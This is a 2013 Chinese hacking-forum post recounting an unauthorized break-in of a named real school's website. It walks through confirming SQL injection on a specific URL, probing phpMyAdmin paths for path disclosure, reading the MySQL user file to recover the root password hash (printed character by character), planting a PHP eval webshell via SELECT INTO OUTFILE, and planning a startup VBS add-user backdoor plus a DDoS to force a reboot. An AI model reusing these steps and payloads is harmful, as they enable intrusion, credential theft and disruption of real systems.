找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3104|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
; Z5 x! @; x" c* A发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
7 U4 a- Q0 h; I+ n3 t7 Z9 R$ s7 H% B/ h9 }4 ]! A; Z! u

& A; m4 D9 H2 |6 K1 @  @, J7 _
8 a* j# e# K6 L0 a; C6 f常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 : T2 r0 S3 @0 J* k% V* J) x% P9 K

4 k5 C7 W8 B; W- X0 X那么想可以直接写入shell ,getshell有几个条件:4 ^0 o! J% W7 E$ N
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
9 R! c% v% b: p2 e9 G4 o
; ^( z- j9 @. d6 U试着爆绝对路径:- F9 [" c6 g: x6 H/ d9 `% d0 V
1./phpMyAdmin/index.php?lang[]=1  6 T* b1 z' @3 \2 I) F! c
2./phpMyAdmin/phpinfo.php  8 Y* a1 E% o; t' M* w1 o. X
3./load_file()  
: |& b1 d' G* x: g4./phpmyadmin/themes/darkblue_orange/layout.inc.php  % ]0 e) B/ _2 I2 g
5./phpmyadmin/libraries/select_lang.lib.php  
+ ^! p! N, [  e5 F6./phpmyadmin/libraries/lect_lang.lib.php  
) E& h+ x$ C+ Y7./phpmyadmin/libraries/mcrypt.lib.php   
* \2 z# j0 i- [" ~; x8./phpmyadmin/libraries/export/xls.php  
' W4 K. ]+ D$ D# v* V; C% O/ z/ g" c$ x4 D
均不行...........................
2 ~8 ]* s# T1 L: ]; ~# P, a9 c4 m( D- N9 G! [& b+ s
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
8 F' Z$ R, o/ K2 v" G
7 @9 ~5 s, A# ^8 S4 A权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 0 n$ o7 B4 ]3 D0 M) A
# }6 Q5 O  N/ G2 B* o8 S
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败2 }0 i2 |* M5 l6 U5 `
- x. O/ Z8 R; e0 B6 ^+ h0 E2 C- R  M, c
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
+ y, U. M! h' y. V3 y3 c, ?9 W0 _9 r1 q- n9 j
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 3 f3 ~9 k  B' m' u( T  B
; n  X5 g' d; C/ t, H" t" U
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini + p) `/ b( K; g7 O8 F) O. X" N

4 V' \* H6 b4 z9 D自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 9 `1 S$ e/ @9 o" T0 ]8 R
( J+ @9 r% i! W2 m1 o7 w# O5 I
成功读到root密码:
" r- Q: q3 h2 A" _1 W2 `$ r, H8 X+ V5 |7 O
17---- r(0072)
/ E# `& B. d4 Z0 F18---- o(006f); a# n1 x+ [' r& [, L
19---- o(006f). T( r9 }, N8 ^5 I& Y5 k& G0 B
20---- t(0074)
6 p8 I5 n2 X8 a& g( v21---- *(002a)+ H3 }" i+ K3 J1 O# z1 H! }& `
22---- 8(0038)3 J) v. w) L6 k, G
23---- 2(0032)# y' ^+ J0 A5 e* c/ \* h
24---- E(0045)
- w9 Y: b: [$ J. F# \9 W25---- 1(0031); b* k8 A  C# N/ H  E. a. F0 v7 f+ S
26---- C(0043)) p! E( V( d- ~, R
27---- 5(0035)
( e1 L; ~& H+ W2 J28---- 8(0038)
' e6 c0 Y: z- B4 f1 u. ^9 Q# Y0 G' z29---- 2(0032): L& r5 Z. Q8 b
30---- 8(0038)
3 z9 p) |# q' d: D3 n31---- A(0041)
  y5 t! O: D! m; e/ R7 |& u2 C32---- 9(0039)
. o; W  v6 u3 S8 Q- V* C33---- B(0042)
& {- W, P( o+ b34---- 5(0035)' [9 V4 K  M: M
35---- 4(0034)
. p* j) l$ a0 N0 L36---- 8(0038)
/ K8 s* B6 g* `3 p# I2 l& b1 P! A37---- 6(0036)
/ _1 K! d9 z6 Z- A: b38---- 4(0034), {% }6 ~/ t4 c, {1 ]
39---- 9(0039)
- n7 z6 ^% O; {9 i% ~9 p40---- 1(0031)
. {: h6 \8 k4 [5 o, S$ t- j) b  ?1 `41---- 1(0031)
" P5 j3 ~/ h% Z42---- 5(0035)6 d+ |% K5 u4 x' @/ L8 b
43---- 3(0033)8 K2 G" R5 @5 }9 r6 W
44---- 5(0035)1 Y' L& _* M4 M! n: `) M
45---- 9(0039)
: J$ d# w* c& F% c4 q( ]46---- 8(0038)1 j* n8 F0 ]3 ~7 L
47---- F(0046)6 w0 ~( H1 E, @0 r, R
48---- F(0046)* [- c! p0 w' Z: J' `! A: i
49---- 4(0034)
3 g+ I7 ?  C8 G9 |2 e% u50---- F(0046)
; H7 d( V( s$ q% |51---- 0(0030)
% ~- Y2 r  \2 W7 s; B) t  U52---- 3(0033)
- ?* n6 k; w; f( w/ f7 l53---- 2(0032)
# p+ w6 F( W! ^. N. n54---- A(0041)
# _, Z. ^; \3 c1 A: Y55---- 4(0034)1 b0 C3 ^0 \7 Y
56---- A(0041)7 ^; L% {" {1 a" w2 E
57---- B(0042)
1 O0 k, q# P' b9 V1 E5 s58---- *(0044)5 {) `5 G. T% i8 p
59---- *(0035)& b% g0 v$ g9 e4 l
60---- *(0041)
. u2 e8 l- D# H. w" ~6 W61---- *0032)6 r# f# f. |$ ^: I& G
, J3 A: m! i( j0 W$ r5 G2 V' @
解密后成功登陆phpmyamin
" t: R/ ?4 i6 Q5 Y" w) T$ ~                          5 F  P+ O& K- c4 a5 O

% D- }& W9 p9 J* j                             - w' U, Y* b7 v

: W3 ^% z. d$ h2 r8 Z* y. O* h找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'  f) w* F# G3 t! }5 ^

# e/ Q6 e2 n6 F+ `, r3 \成功执行,拿下shell,菜刀连接:
; `$ R. [4 e9 A3 Q! A* c. ^' R. P) P% e
服务器不支持asp,aspx,php提权无果...................1 g, @7 q9 q' B( j

0 J- X" _7 T9 ^/ e, V8 h9 `. `但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:: s2 Q: p  U8 g8 T1 x6 m
服务器上已经有个隐藏帐号了
  o. `8 a* ~, _" O9 N% s6 l2 s7 o8 m
别名     administrators
$ l; b- z+ I' v注释     管理员对计算机/域有不受限制的完全访问权

; S/ ~9 d! r  Q# f
成员
5 ^/ v8 Q9 g& s2 ^
-------------------------------------------------------------------------------9 N9 M& p( t& u
admin
$ t3 q4 y3 I8 y+ |Administrator
  v  }9 C) O, N! Xslipper$$ i' Y/ ?- X, k; I8 J; J
sqluser4 `6 Y7 t2 K" T- r/ _
命令成功完成。
1 v& Z) M. J0 t) j
7 `* Q) u' S1 D$ X服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。& Y7 W7 q& x1 E0 |3 o
& X7 Q4 n2 u7 D7 R) I
ddos服务器重启,不然就只能坐等服务器重启了...............................3 e, c! G" S+ j4 a( i6 W4 v& ]( Q$ m
7 P) n" i7 i" D( J
      
0 a. N' p5 U6 ~* u4 X

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表